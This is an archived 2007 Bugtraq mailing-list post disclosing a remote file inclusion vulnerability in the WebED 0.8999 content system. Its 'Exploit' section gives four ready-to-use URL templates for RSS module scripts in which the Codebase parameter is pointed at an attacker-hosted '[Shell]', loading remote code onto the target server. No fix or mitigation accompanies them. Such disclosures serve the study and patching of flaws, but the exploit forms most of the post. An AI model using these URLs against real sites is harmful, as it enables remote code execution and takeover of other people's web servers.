WebED-0.8999 Multiple Remote File Inclusion Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: WebED-0.8999 Multiple Remote File Inclusion Vulnerability
From: h3llcode@xxxxxxxxxx
Date: 20 Sep 2007 16:38:27 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

---------------------------------------------------------------

Multiple Remote File Inclusion Vulnerability

---------------------------------------------------------------

# Founded by : Seph1roth 

# Download Script: http://sourceforge.net/projects/ed-engine/ 
WebED-0.8999.tar.gz

# Exploit:

# http://[target]/[path]/source/mod/rss/channeledit.php?Codebase=[Shell]

# http://[target]/[path]/source/mod/rss/post.php?Codebase=[Shell]

# http://[target]/[path]/source/mod/rss/view.php?Codebase=[Shell]

# http://[target]/[path]/source/mod/rss/viewitem.php?Codebase=[Shell]

---------------------------------------------------------------

Prev by Date: PhpBB Xs 2 profile.php Permanent Xss Vulnerability
Next by Date: PHP-Nuke add admin ALL Versions
Previous by thread: PhpBB Xs 2 profile.php Permanent Xss Vulnerability
Next by thread: PHP-Nuke add admin ALL Versions
Index(es):
- Date
- Thread